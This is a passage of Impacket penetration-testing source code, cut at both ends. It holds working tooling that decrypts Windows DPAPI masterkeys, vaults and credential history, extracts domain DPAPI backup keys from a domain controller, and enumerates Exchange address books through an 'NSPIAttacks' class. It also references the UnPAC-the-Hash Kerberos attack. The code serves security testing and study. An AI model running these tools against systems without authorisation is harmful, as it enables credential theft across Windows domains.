or keys ' \\\n 'of the service account who owns SPN \"cifs/service.domain.local\")'\n ticket_decryption.add_argument('-p', '--password', action=\"store\", metavar=\"PASSWORD\", help='Cleartext password of the service account')\n ticket_decryption.add_argument('-hp', '--hex-password', dest='hex_pass', action=\"store\", metavar=\"HEXPASSWORD\", help='Hex password of the service account')\n ticket_decryption.add_argument('-u', '--user', action=\"store\", metavar=\"USER\", help='Name of the service account')\n ticket_decryption.add_argument('-d', '--domain', action=\"store\", metavar=\"DOMAIN\", help='FQDN Domain')\n ticket_decryption.add_argument('-s', '--salt', action=\"store\", metavar=\"SALT\", help='Salt for keys calculation (DOMAIN.LOCALSomeuser for users, DOMAIN.LOCALhostsomemachine.domain.local for machines)')\n ticket_decryption.add_argument('--rc4', action=\"store\", metavar=\"RC4\", help='RC4 KEY (i.e. NT hash)')\n ticket_decryption.add_argument('--aes', action=\"store\", metavar=\"HEXKEY\", help='AES128 or AES256 key')\n\n credential_info = parser.add_argument_group()\n credential_info.title = 'PAC Credentials decryption material'\n credential_info.description = '[MS-PAC] section 2.6 (PAC Credentials) describes an element that is used to send credentials for alternate security protocols to the client during initial logon.' \\\n 'This PAC credentials is typically used when PKINIT is conducted for pre-authentication. This structure contains LM and NT hashes.' \\\n 'The information is encrypted using the AS reply key. Attack primitive known as UnPAC-the-Hash. (https://www.thehacker.recipes/ad/movement/kerberos/unpac-the-hash)'\n credential_info.add_argument('--asrep-key', action=\"store\", metavar=\"HEXKEY\", help='AS reply key for PAC Credentials decryption')\n\n\n if len(sys.argv) == 1:\n parser.print_help()\n sys.exit(1)\n\n args = parser.parse_args()\n\n if not args.salt:\n if args.user and not args.domain:\n parser.error('without -s/--salt, and with -u/--user, argument -d/--domain is required to calculate the salt')\n elif not args.user and args.domain:\n parser.error('without -s/--salt, and with -d/--domain, argument -u/--user is required to calculate the salt')\n\n if args.domain and not '.' in args.domain:\n parser.error('Domain supplied in -d/--domain should be FQDN')\n\n return args\n\ndef main():\n print(version.BANNER)\n args = parse_args()\n logger.init(args.ts, args.debug)\n\n try:\n parse_ccache(args)\n except Exception as e:\n if logging.getLogger().level == logging.DEBUG:\n traceback.print_exc()\n logging.error(str(e))\n\nif __name__ == '__main__':\n main()\n" }, { "path": "examples/dpapi.py", "content": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# Example for using the DPAPI/Vault structures to unlock Windows Secrets.\n#\n# Author:\n# Alberto Solino (@agsolino)\n#\n# Examples:\n#\n# You can unlock masterkeys, credentials and vaults. For the three, you will specify the file name (using -file for\n# masterkeys and credentials, and -vpol and -vcrd for vaults).\n# If no other parameter is sent, the contents of these resource will be shown, with their encrypted data as well.\n# If you specify a -key blob (in the form of '0xabcdef...') that key will be used to decrypt the contents.\n# In the case of vaults, you might need to also provide the user's sid (and the user password will be asked).\n# For system secrets, instead of a password you will need to specify the system and security hives.\n#\n# References:\n# All of the work done by these guys. I just adapted their work to my needs.\n# - https://www.passcape.com/index.php?section=docsys&cmd=details&id=28\n# - https://github.com/jordanbtucker/dpapick\n# - https://github.com/gentilkiwi/mimikatz/wiki/howto-~-credential-manager-saved-credentials (and everything else Ben did )\n# - http://blog.digital-forensics.it/2016/01/windows-revaulting.html\n# - https://www.passcape.com/windows_password_recovery_vault_explorer\n# - https://www.passcape.com/windows_password_recovery_dpapi_master_key\n#\n\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport struct\nimport argparse\nimport logging\nimport sys\nfrom six import b\nfrom binascii import unhexlify, hexlify\nfrom hashlib import pbkdf2_hmac\n\nfrom Cryptodome.Cipher import AES, PKCS1_v1_5\nfrom Cryptodome.Hash import HMAC, SHA1, MD4\nfrom impacket.uuid import bin_to_string\nfrom impacket import crypto\nfrom impacket.smbconnection import SMBConnection\nfrom impacket.dcerpc.v5 import transport\nfrom impacket.dcerpc.v5 import lsad\nfrom impacket.dcerpc.v5 import bkrp\nfrom impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_PKT_PRIVACY, RPC_C_AUTHN_GSS_NEGOTIATE\nfrom impacket import version\nfrom impacket.examples import logger\nfrom impacket.examples.utils import parse_target\nfrom impacket.examples.secretsdump import LocalOperations, LSASecrets\nfrom impacket.structure import hexdump\nfrom impacket.dpapi import MasterKeyFile, MasterKey, CredHist, DomainKey, CredentialFile, DPAPI_BLOB, \\\n CREDENTIAL_BLOB, VAULT_VCRD, VAULT_VPOL, VAULT_KNOWN_SCHEMAS, VAULT_VPOL_KEYS, P_BACKUP_KEY, PREFERRED_BACKUP_KEY, \\\n PVK_FILE_HDR, PRIVATE_KEY_BLOB, privatekeyblob_to_pkcs1, DPAPI_DOMAIN_RSA_MASTER_KEY, deriveKeysFromUser, deriveKeysFromUserkey, CREDHIST_FILE\n\n\nclass DPAPI:\n def __init__(self, options):\n self.options = options\n self.dpapiSystem = {}\n pass\n\n def getDPAPI_SYSTEM(self,secretType, secret):\n if secret.startswith(\"dpapi_machinekey:\"):\n machineKey, userKey = secret.split('\\n')\n machineKey = machineKey.split(':')[1]\n userKey = userKey.split(':')[1]\n self.dpapiSystem['MachineKey'] = unhexlify(machineKey[2:])\n self.dpapiSystem['UserKey'] = unhexlify(userKey[2:])\n\n def getLSA(self):\n localOperations = LocalOperations(self.options.system)\n bootKey = localOperations.getBootKey()\n\n lsaSecrets = LSASecrets(self.options.security, bootKey, None, isRemote=False, history=False, perSecretCallback = self.getDPAPI_SYSTEM)\n\n lsaSecrets.dumpSecrets()\n\n # Did we get the values we wanted?\n if 'MachineKey' not in self.dpapiSystem or 'UserKey' not in self.dpapiSystem:\n logging.error('Cannot grab MachineKey/UserKey from LSA, aborting...')\n sys.exit(1)\n\n def run(self):\n if self.options.action.upper() == 'MASTERKEY':\n fp = open(options.file, 'rb')\n data = fp.read()\n mkf= MasterKeyFile(data)\n mkf.dump()\n data = data[len(mkf):]\n\n if mkf['MasterKeyLen'] > 0:\n mk = MasterKey(data[:mkf['MasterKeyLen']])\n data = data[len(mk):]\n\n if mkf['BackupKeyLen'] > 0:\n bkmk = MasterKey(data[:mkf['BackupKeyLen']])\n data = data[len(bkmk):]\n\n if mkf['CredHistLen'] > 0:\n ch = CredHist(data[:mkf['CredHistLen']])\n data = data[len(ch):]\n\n if mkf['DomainKeyLen'] > 0:\n dk = DomainKey(data[:mkf['DomainKeyLen']])\n data = data[len(dk):]\n\n if self.options.system and self.options.security and self.options.sid is None:\n # We have hives, let's try to decrypt with them\n self.getLSA()\n decryptedKey = mk.decrypt(self.dpapiSystem['UserKey'])\n if decryptedKey:\n print('Decrypted key with UserKey')\n print('Decrypted key: 0x%s' % hexlify(decryptedKey).decode('latin-1'))\n return\n decryptedKey = mk.decrypt(self.dpapiSystem['MachineKey'])\n if decryptedKey:\n print('Decrypted key with MachineKey')\n print('Decrypted key: 0x%s' % hexlify(decryptedKey).decode('latin-1'))\n return\n decryptedKey = bkmk.decrypt(self.dpapiSystem['UserKey'])\n if decryptedKey:\n print('Decrypted Backup key with UserKey')\n print('Decrypted key: 0x%s' % hexlify(decryptedKey).decode('latin-1'))\n return\n decryptedKey = bkmk.decrypt(self.dpapiSystem['MachineKey'])\n if decryptedKey:\n print('Decrypted Backup key with MachineKey')\n print('Decrypted key: 0x%s' % hexlify(decryptedKey).decode('latin-1'))\n return\n elif self.options.system and self.options.security:\n # Use SID + hash\n # We have hives, let's try to decrypt with them\n self.getLSA()\n key1, key2 = deriveKeysFromUserkey(self.options.sid, self.dpapiSystem['UserKey'])\n decryptedKey = mk.decrypt(key1)\n if decryptedKey:\n print('Decrypted key with UserKey + SID')\n print('Decrypted key: 0x%s' % hexlify(decryptedKey).decode('latin-1'))\n return\n decryptedKey = bkmk.decrypt(key1)\n if decryptedKey:\n print('Decrypted Backup key with UserKey + SID')\n print('Decrypted key: 0x%s' % hexlify(decryptedKey).decode('latin-1'))\n return\n decryptedKey = mk.decrypt(key2)\n if decryptedKey:\n print('Decrypted key with UserKey + SID')\n print('Decrypted key: 0x%s' % hexlify(decryptedKey).decode('latin-1'))\n return\n decryptedKey = bkmk.decrypt(key2)\n if decryptedKey:\n print('Decrypted Backup key with UserKey + SID')\n print('Decrypted key: 0x%s' % hexlify(decryptedKey).decode('latin-1'))\n return\n elif self.options.key and self.options.sid:\n key = unhexlify(self.options.key[2:])\n key1, key2 = deriveKeysFromUserkey(self.options.sid, key)\n decryptedKey = mk.decrypt(key1)\n if decryptedKey:\n print('Decrypted key with key provided + SID')\n print('Decrypted key: 0x%s' % hexlify(decryptedKey).decode('latin-1'))\n return\n decryptedKey = mk.decrypt(key2)\n if decryptedKey:\n print('Decrypted key with key provided + SID')\n print('Decrypted key: 0x%s' % hexlify(decryptedKey).decode('latin-1'))\n return\n elif self.options.key:\n key = unhexlify(self.options.key[2:])\n decryptedKey = mk.decrypt(key)\n if decryptedKey:\n print('Decrypted key with key provided')\n print('Decrypted key: 0x%s' % hexlify(decryptedKey).decode('latin-1'))\n return\n\n elif self.options.pvk and dk:\n pvkfile = open(self.options.pvk, 'rb').read()\n key = PRIVATE_KEY_BLOB(pvkfile[len(PVK_FILE_HDR()):])\n private = privatekeyblob_to_pkcs1(key)\n cipher = PKCS1_v1_5.new(private)\n\n decryptedKey = cipher.decrypt(dk['SecretData'][::-1], None)\n if decryptedKey:\n domain_master_key = DPAPI_DOMAIN_RSA_MASTER_KEY(decryptedKey)\n key = domain_master_key['buffer'][:domain_master_key['cbMasterKey']]\n print('Decrypted key with domain backup key provided')\n print('Decrypted key: 0x%s' % hexlify(key).decode('latin-1'))\n return\n\n elif self.options.sid and self.options.key is None:\n # Do we have a password?\n if self.options.password is None:\n # Nope let's ask it\n from getpass import getpass\n password = getpass(\"Password:\")\n else:\n password = options.password\n key1, key2, key3 = deriveKeysFromUser(self.options.sid, password)\n\n # if mkf['flags'] & 4 ? SHA1 : MD4\n decryptedKey = mk.decrypt(key3)\n if decryptedKey:\n print('Decrypted key with User Key (MD4 protected)')\n print('Decrypted key: 0x%s' % hexlify(decryptedKey).decode('latin-1'))\n return\n\n decryptedKey = mk.decrypt(key2)\n if decryptedKey:\n print('Decrypted key with User Key (MD4)')\n print('Decrypted key: 0x%s' % hexlify(decryptedKey).decode('latin-1'))\n return\n\n decryptedKey = mk.decrypt(key1)\n if decryptedKey:\n print('Decrypted key with User Key (SHA1)')\n print('Decrypted key: 0x%s' % hexlify(decryptedKey).decode('latin-1'))\n return\n\n decryptedKey = bkmk.decrypt(key3)\n if decryptedKey:\n print('Decrypted Backup key with User Key (MD4 protected)')\n print('Decrypted key: 0x%s' % hexlify(decryptedKey).decode('latin-1'))\n return\n\n decryptedKey = bkmk.decrypt(key2)\n if decryptedKey:\n print('Decrypted Backup key with User Key (MD4)')\n print('Decrypted key: 0x%s' % hexlify(decryptedKey).decode('latin-1'))\n return\n\n decryptedKey = bkmk.decrypt(key1)\n if decryptedKey:\n print('Decrypted Backup key with User Key (SHA1)')\n print('Decrypted key: 0x%s' % hexlify(decryptedKey).decode('latin-1'))\n return\n\n elif self.options.target is not None:\n domain, username, password, remoteName = parse_target(self.options.target)\n\n if domain is None:\n domain = ''\n\n if password == '' and username != '' and self.options.hashes is None and self.options.no_pass is False and self.options.aesKey is None:\n from getpass import getpass\n password = getpass(\"Password:\")\n\n if self.options.hashes is not None:\n lmhash, nthash = self.options.hashes.split(':')\n else:\n lmhash, nthash = '',''\n\n rpctransport = transport.DCERPCTransportFactory(r'ncacn_np:%s[\\PIPE\\protected_storage]' % remoteName)\n\n if hasattr(rpctransport, 'set_credentials'):\n # This method exists only for selected protocol sequences.\n rpctransport.set_credentials(username, password, domain, lmhash, nthash, self.options.aesKey)\n \n rpctransport.set_kerberos(self.options.k, self.options.dc_ip)\n \n dce = rpctransport.get_dce_rpc()\n dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)\n if self.options.k is True:\n dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)\n dce.connect()\n dce.bind(bkrp.MSRPC_UUID_BKRP, transfer_syntax = ('8a885d04-1ceb-11c9-9fe8-08002b104860', '2.0'))\n \n request = bkrp.BackuprKey()\n request['pguidActionAgent'] = bkrp.BACKUPKEY_RESTORE_GUID\n request['pDataIn'] = dk.getData()\n request['cbDataIn'] = len(dk.getData())\n request['dwParam'] = 0\n\n resp = dce.request(request)\n \n ## Stripping heading zeros resulting from asymetric decryption\n beginning=0\n for i in range(len(resp['ppDataOut'])):\n if resp['ppDataOut'][i]==b'\\x00':\n beginning+=1\n else:\n break\n masterkey=b''.join(resp['ppDataOut'][beginning:])\n print('Decrypted key using rpc call')\n print('Decrypted key: 0x%s' % hexlify(masterkey).decode())\n return\n\n else:\n # Just print key's data\n if mkf['MasterKeyLen'] > 0:\n mk.dump()\n\n if mkf['BackupKeyLen'] > 0:\n bkmk.dump()\n\n if mkf['CredHistLen'] > 0:\n ch.dump()\n\n if mkf['DomainKeyLen'] > 0:\n dk.dump()\n\n # credit to @gentilkiwi\n elif self.options.action.upper() == 'BACKUPKEYS':\n domain, username, password, address = parse_target(self.options.target)\n\n if password == '' and username != '' and self.options.hashes is None and self.options.no_pass is False and self.options.aesKey is None:\n from getpass import getpass\n password = getpass (\"Password:\")\n if self.options.hashes is not None:\n lmhash, nthash = self.options.hashes.split(':')\n else:\n lmhash, nthash = '',''\n connection = SMBConnection(address, address)\n if self.options.k:\n connection.kerberosLogin(username, password, domain, lmhash, nthash, self.options.aesKey)\n else:\n connection.login(username, password, domain, lmhash=lmhash, nthash=nthash)\n\n rpctransport = transport.DCERPCTransportFactory(r'ncacn_np:445[\\pipe\\lsarpc]')\n rpctransport.set_smb_connection(connection)\n dce = rpctransport.get_dce_rpc()\n if self.options.k:\n dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)\n try:\n dce.connect()\n dce.bind(lsad.MSRPC_UUID_LSAD)\n except transport.DCERPCException as e:\n raise e\n\n resp = lsad.hLsarOpenPolicy2(dce, lsad.POLICY_GET_PRIVATE_INFORMATION)\n for keyname in (\"G$BCKUPKEY_PREFERRED\", \"G$BCKUPKEY_P\"):\n buffer = crypto.decryptSecret(connection.getSessionKey(), lsad.hLsarRetrievePrivateData(dce,\n resp['PolicyHandle'], keyname))\n guid = bin_to_string(buffer)\n name = \"G$BCKUPKEY_{}\".format(guid)\n secret = crypto.decryptSecret(connection.getSessionKey(), lsad.hLsarRetrievePrivateData(dce,\n resp['PolicyHandle'], name))\n keyVersion = struct.unpack(' 28:\n attribute = blob.attributes[i]\n if 'IV' in attribute.fields and len(attribute['IV']) == 16:\n cipher = AES.new(key, AES.MODE_CBC, iv=attribute['IV'])\n else:\n cipher = AES.new(key, AES.MODE_CBC)\n cleartext = cipher.decrypt(attribute['Data'])\n\n if cleartext is not None:\n # Lookup schema Friendly Name and print if we find one\n if blob['FriendlyName'].decode('utf-16le')[:-1] in VAULT_KNOWN_SCHEMAS:\n # Found one. Cast it and print\n vault = VAULT_KNOWN_SCHEMAS[blob['FriendlyName'].decode('utf-16le')[:-1]](cleartext)\n vault.dump()\n else:\n # otherwise\n hexdump(cleartext)\n return\n else:\n blob.dump()\n\n elif options.vpol is not None:\n fp = open(options.vpol, 'rb')\n data = fp.read()\n vpol = VAULT_VPOL(data)\n vpol.dump()\n\n if self.options.key is not None:\n key = unhexlify(self.options.key[2:])\n blob = vpol['Blob']\n data = blob.decrypt(key)\n if data is not None:\n keys = VAULT_VPOL_KEYS(data)\n keys.dump()\n return\n elif self.options.action.upper() == 'UNPROTECT':\n fp = open(options.file, 'rb')\n data = fp.read()\n blob = DPAPI_BLOB(data)\n\n if self.options.key is not None:\n key = unhexlify(self.options.key[2:])\n if self.options.entropy_file is not None:\n fp2 = open(self.options.entropy_file, 'rb')\n entropy = fp2.read()\n fp2.close()\n elif self.options.entropy is not None:\n entropy = b(self.options.entropy)\n else:\n entropy = None\n\n decrypted = blob.decrypt(key, entropy)\n if decrypted is not None:\n print('Successfully decrypted data')\n hexdump(decrypted)\n return\n else:\n # Just print the data\n blob.dump()\n\n elif self.options.action.upper() == 'CREDHIST':\n fp = open(self.options.file, 'rb')\n data = fp.read()\n chf = CREDHIST_FILE(data)\n\n if len(chf.credhist_entries_list) == 0:\n print('The CREDHIST file is empty')\n return\n\n # Handle key options\n if self.options.key:\n key = unhexlify(self.options.key[2:])\n keys = deriveKeysFromUserkey(chf.credhist_entries_list[0].sid, key)\n\n # Only other option is using a password\n else:\n # Do we have a password?\n if self.options.password is None:\n # Nope let's ask it\n from getpass import getpass\n password = getpass(\"Password:\")\n else:\n password = options.password\n\n keys = deriveKeysFromUser(chf.credhist_entries_list[0].sid, password)\n\n if self.options.entry is None:\n # First find the correct key to the 1st entry\n real_key = None\n for k in keys:\n chf.decrypt_entry_by_index(0, k)\n if chf.credhist_entries_list[0].pwdhash is not None:\n real_key = k\n break\n\n # Wrong key\n if real_key is None:\n chf.dump()\n print()\n print('Cannot decrypt (wrong key or password)')\n return\n\n else:\n chf.decrypt(real_key)\n chf.dump()\n\n # Fully successful decryption\n if chf.credhist_entries_list[-1].pwdhash is not None:\n return\n\n else:\n for k in keys:\n chf.decrypt_entry_by_index(self.options.entry, k)\n if chf.credhist_entries_list[self.options.entry].pwdhash is not None:\n chf.credhist_entries_list[self.options.entry].dump()\n return\n\n chf.credhist_entries_list[self.options.entry].dump()\n print()\n print('Cannot decrypt (wrong key or password)')\n return\n\n print('Cannot decrypt (specify -key or -sid whenever applicable) ')\n\n\nif __name__ == '__main__':\n print(version.BANNER)\n\n parser = argparse.ArgumentParser(add_help=True, description=\"Example for using the DPAPI/Vault structures to unlock Windows Secrets.\")\n parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')\n subparsers = parser.add_subparsers(help='actions', dest='action')\n\n # A domain backup key command\n backupkeys = subparsers.add_parser('backupkeys', help='domain backup key related functions')\n backupkeys.add_argument('-t', '--target', action='store', required=True, help='[[domain/]username[:password]@]')\n backupkeys.add_argument('-hashes', action=\"store\", metavar = \"LMHASH:NTHASH\", help='NTLM hashes, format is LMHASH:NTHASH')\n backupkeys.add_argument('-no-pass', action=\"store_true\", help='don\\'t ask for password (useful for -k)')\n backupkeys.add_argument('-k', action=\"store_true\", required=False, help='Use Kerberos authentication. Grabs credentials from ccache file '\n '(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the '\n 'ones specified in the command line')\n backupkeys.add_argument('-aesKey', action=\"store\", metavar = \"hex key\", help='AES key to use for Kerberos Authentication '\n '(128 or 256 bits)')\n backupkeys.add_argument('-dc-ip', action='store',metavar = \"ip address\", help='IP Address of the domain controller. '\n 'If omitted it will use the domain part (FQDN) specified in the target parameter')\n backupkeys.add_argument('--export', action='store_true', required=False, help='export keys to file')\n\n # A masterkey command\n masterkey = subparsers.add_parser('masterkey', help='masterkey related functions')\n masterkey.add_argument('-file', action='store', required=True, help='Master Key File to parse')\n masterkey.add_argument('-sid', action='store', help='SID of the user')\n masterkey.add_argument('-pvk', action='store', help='Domain backup privatekey to use for decryption')\n masterkey.add_argument('-key', action='store', help='Specific key to use for decryption')\n masterkey.add_argument('-password', action='store', help='User\\'s password. If you specified the SID and not the password it will be prompted')\n masterkey.add_argument('-system', action='store', help='SYSTEM hive to parse')\n masterkey.add_argument('-security', action='store', help='SECURITY hive to parse')\n masterkey.add_argument('-t', '--target', action='store', help='The masterkey owner\\'s credentails to ask the DC for decryption'\n 'Format: [[domain/]username[:password]@]')\n masterkey.add_argument('-hashes', action=\"store\", metavar = \"LMHASH:NTHASH\", help='NTLM hashes, format is LMHASH:NTHASH')\n masterkey.add_argument('-no-pass', action=\"store_true\", help='don\\'t ask for password (useful for -k)')\n masterkey.add_argument('-k', action=\"store_true\", help='Use Kerberos authentication. Grabs credentials from ccache file '\n '(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the '\n 'ones specified in the command line')\n masterkey.add_argument('-aesKey', action=\"store\", metavar = \"hex key\", help='AES key to use for Kerberos Authentication '\n '(128 or 256 bits)')\n masterkey.add_argument('-dc-ip', action='store',metavar = \"ip address\", help='IP Address of the domain controller. '\n 'If omitted it will use the domain part (FQDN) specified in the target parameter')\n\n # A credential command\n credential = subparsers.add_parser('credential', help='credential related functions')\n credential.add_argument('-file', action='store', required=True, help='Credential file')\n credential.add_argument('-key', action='store', required=False, help='Key used for decryption')\n\n # A vault command\n vault = subparsers.add_parser('vault', help='vault credential related functions')\n vault.add_argument('-vcrd', action='store', required=False, help='Vault Credential file')\n vault.add_argument('-vpol', action='store', required=False, help='Vault Policy file')\n vault.add_argument('-key', action='store', required=False, help='Master key used for decryption')\n\n # A CryptUnprotectData command\n unprotect = subparsers.add_parser('unprotect', help='Provides CryptUnprotectData functionality')\n unprotect.add_argument('-file', action='store', required=True, help='File with DATA_BLOB to decrypt')\n unprotect.add_argument('-key', action='store', required=False, help='Key used for decryption')\n unprotect.add_argument('-entropy', action='store', default=None, required=False, help='String with extra entropy needed for decryption')\n unprotect.add_argument('-entropy-file', action='store', default=None, required=False, help='File with binary entropy contents (overwrites -entropy)')\n\n # A CREDHIST command\n credhist = subparsers.add_parser('credhist', help='CREDHIST related functions')\n credhist.add_argument('-file', action='store', required=True, help='CREDHIST file')\n credhist.add_argument('-key', action='store', help='Specific key to use for decryption')\n credhist.add_argument('-password', action='store', help='User\\'s password')\n credhist.add_argument('-entry', action='store', type=int, help='Entry index in CREDHIST')\n\n options = parser.parse_args()\n # Init the example's logger theme\n logger.init(options.ts, options.debug)\n\n if len(sys.argv)==1:\n parser.print_help()\n sys.exit(1)\n\n try:\n executer = DPAPI(options)\n executer.run()\n except Exception as e:\n if logging.getLogger().level == logging.DEBUG:\n import traceback\n traceback.print_exc()\n print('ERROR: %s' % str(e))\n" }, { "path": "examples/esentutl.py", "content": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# ESE utility. Allows dumping catalog, pages and tables.\n#\n# Author:\n# Alberto Solino (@agsolino)\n#\n# Reference for:\n# Extensive Storage Engine (ese)\n#\n\nfrom __future__ import division\nfrom __future__ import print_function\nimport sys\nimport logging\nimport argparse\n\nfrom impacket.examples import logger\nfrom impacket import version\nfrom impacket.ese import ESENT_DB\n\n\ndef dumpPage(ese, pageNum):\n data = ese.getPage(pageNum)\n data.dump()\n\ndef exportTable(ese, tableName):\n cursor = ese.openTable(tableName)\n if cursor is None:\n logging.error('Can\"t get a cursor for table: %s' % tableName)\n return\n\n i = 1\n print(\"Table: %s\" % tableName)\n while True:\n try:\n record = ese.getNextRow(cursor)\n except Exception:\n logging.debug('Exception:', exc_info=True)\n logging.error('Error while calling getNextRow(), trying the next one')\n continue\n\n if record is None:\n break\n print(\"*** %d\" % i)\n for j in list(record.keys()):\n if record[j] is not None:\n print(\"%-30s: %r\" % (j, record[j]))\n i += 1\n\ndef main():\n print(version.BANNER)\n\n parser = argparse.ArgumentParser(add_help = True, description = \"Extensive Storage Engine utility. Allows dumping \"\n \"catalog, pages and tables.\")\n parser.add_argument('databaseFile', action='store', help='ESE to open')\n parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')\n parser.add_argument('-page', action='store', help='page to open')\n\n subparsers = parser.add_subparsers(help='actions', dest='action')\n\n # dump page\n dump_parser = subparsers.add_parser('dump', help='dumps an specific page')\n dump_parser.add_argument('-page', action='store', required=True, help='page to dump')\n\n # info page\n subparsers.add_parser('info', help='dumps the catalog info for the DB')\n\n # export page\n export_parser = subparsers.add_parser('export', help='dumps the catalog info for the DB')\n export_parser.add_argument('-table', action='store', required=True, help='table to dump')\n\n if len(sys.argv)==1:\n parser.print_help()\n sys.exit(1)\n\n options = parser.parse_args()\n # Init the example's logger theme\n logger.init(options.ts, options.debug)\n\n ese = ESENT_DB(options.databaseFile)\n\n try:\n if options.action.upper() == 'INFO':\n ese.printCatalog()\n elif options.action.upper() == 'DUMP':\n dumpPage(ese, int(options.page))\n elif options.action.upper() == 'EXPORT':\n exportTable(ese, options.table)\n else:\n raise Exception('Unknown action %s ' % options.action)\n except Exception as e:\n if logging.getLogger().level == logging.DEBUG:\n import traceback\n traceback.print_exc()\n print(e)\n ese.close()\n\n\nif __name__ == '__main__':\n main()\n sys.exit(1)\n" }, { "path": "examples/exchanger.py", "content": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# A tool for connecting to MS Exchange via RPC over HTTP v2\n#\n# Notes about -rpc-hostname:\n# Our RPC over HTTP v2 implementation tries to extract the\n# target's NetBIOS name via NTLMSSP and use it as RPC Server name.\n# If it fails, you have to manually get the target RPC Server name\n# from the Autodiscover service and set it in the -rpc-hostname parameter.\n#\n# Author:\n# Arseniy Sharoglazov / Positive Technologies (https://www.ptsecurity.com/)\n#\n# References:\n# - https://swarm.ptsecurity.com/attacking-ms-exchange-web-interfaces/\n#\n\nfrom __future__ import print_function\nimport base64\nimport codecs\nimport logging\nimport argparse\nimport binascii\nimport sys\nfrom six import PY3\n\nfrom impacket import uuid, version\nfrom impacket.http import AUTH_BASIC\nfrom impacket.examples import logger\nfrom impacket.examples.utils import parse_target\nfrom impacket.structure import parse_bitmask\nfrom impacket.dcerpc.v5 import transport, nspi\nfrom impacket.mapi_constants import PR_CONTAINER_FLAGS_VALUES, MAPI_PROPERTIES\nfrom impacket.dcerpc.v5.nspi import CP_TELETEX, ExchBinaryObject, \\\n get_guid_from_dn, get_dn_from_guid\nfrom impacket.dcerpc.v5.rpch import RPC_PROXY_REMOTE_NAME_NEEDED_ERR, \\\n RPC_PROXY_HTTP_IN_DATA_401_ERR, RPC_PROXY_CONN_A1_0X6BA_ERR, \\\n RPC_PROXY_CONN_A1_404_ERR, RPC_PROXY_RPC_OUT_DATA_404_ERR, \\\n RPC_PROXY_CONN_A1_401_ERR\n\nPY37ORHIGHER = sys.version_info >= (3, 7)\nPR_CONTAINER_FLAGS = 0x36000003\nPR_ENTRYID = 0x0fff0102\nPR_DEPTH = 0x30050003\nPR_EMS_AB_IS_MASTER = 0xfffb000B\nPR_EMS_AB_CONTAINERID = 0xfffd0003\nPR_EMS_AB_PARENT_ENTRYID = 0xfffc0102\nPR_DISPLAY_NAME = 0x3001001F\nPR_EMS_AB_OBJECT_GUID = 0x8c6d0102\nPR_INSTANCE_KEY = 0x0ff60102\n\nDELIMITER = \"=======================\"\n\nclass Exchanger:\n def __init__(self):\n self._username = ''\n self._password = ''\n self._domain = ''\n self._lmhash = ''\n self._nthash = ''\n\n self._extended_output = False\n self._output_type = 'hex'\n\n self._stringbinding = None\n self._rpctransport = None\n\n self.__outputFileName = None\n self.__outputFd = None\n\n def conenct_mapi(self):\n raise NotImplementedError('Virtual method. Not implemented in subclass!')\n\n def connect_rpc(self):\n raise NotImplementedError('Virtual method. Not implemented in subclass!')\n\n def load_autodiscover(self):\n # This should be implemented only as optional,\n # and the implementation should support processing emails\n # which do not belong to the used for the authentication account\n raise NotImplementedError('Not Implemented!')\n\n def set_credentials(self, username='', password='', domain='', hashes=None):\n self._username = username\n self._password = password\n self._domain = domain\n self._lmhash = ''\n self._nthash = ''\n\n if hashes is not None:\n self._lmhash, self._nthash = hashes.split(':')\n\n def set_extended_output(self, output_mode):\n self._extended_output = output_mode\n\n def set_output_type(self, output_type):\n self._output_type = output_type\n\n def set_output_file(self, filename):\n self.__outputFileName = filename\n self.__outputFd = open(self.__outputFileName, 'w+')\n\n def print(self, text):\n if self.__outputFd != None:\n if PY3:\n self.__outputFd.write(text + '\\n')\n else:\n self.__outputFd.write((text + '\\n').encode('utf-8'))\n print(text)\n\n def _encode_binary(self, bytestr):\n if PY3 and self._output_type == \"hex\":\n return \"0x%s\" % str(binascii.hexlify(bytestr), 'ascii')\n elif self._output_type == \"hex\":\n return \"0x%s\" % binascii.hexlify(bytestr)\n elif PY3:\n return str(base64.b64encode(bytestr), 'ascii')\n else:\n return base64.b64encode(bytestr)\n\n def __del__(self):\n if self.__outputFd != None:\n self.__outputFd.close()\n self.__outputFd = None\n\nclass NSPIAttacks(Exchanger):\n PROPS_GUID = [PR_EMS_AB_OBJECT_GUID]\n\n PROPS_MINUMAL = [\n 0x3a00001F, # mailNickname\n 0x39fe001F, # mail\n 0x80270102, # objectSID\n 0x30070040, # whenCreated\n 0x30080040, # whenChanged\n 0x8c6d0102, # objectGUID\n ]\n\n PROPS_EXTENDED = PROPS_MINUMAL + [\n # Names\n 0x3a0f001f, # cn\n 0x8202001f, # name\n 0x0fff0102, # PR_ENTRYID\n 0x3001001f, # PR_DISPLAY_NAME\n 0x3a20001f, # PR_TRANSMITABLE_DISPLAY_NAME\n 0x39ff001f, # displayNamePrintable\n 0x800f101f, # proxyAddresses\n 0x8171001f, # lDAPDisplayName\n 0x8102101f, # ou\n 0x804b001F, # adminDisplayName\n\n # Text Properties\n 0x806f101f, # description\n 0x3004001f, # info\n 0x8069001f, # c\n 0x3a26001f, # co\n 0x3a2a001f, # postalCode\n 0x3a28001f, # st\n 0x3a29001f, # streetAddress\n 0x3a09001f, # homePhone\n 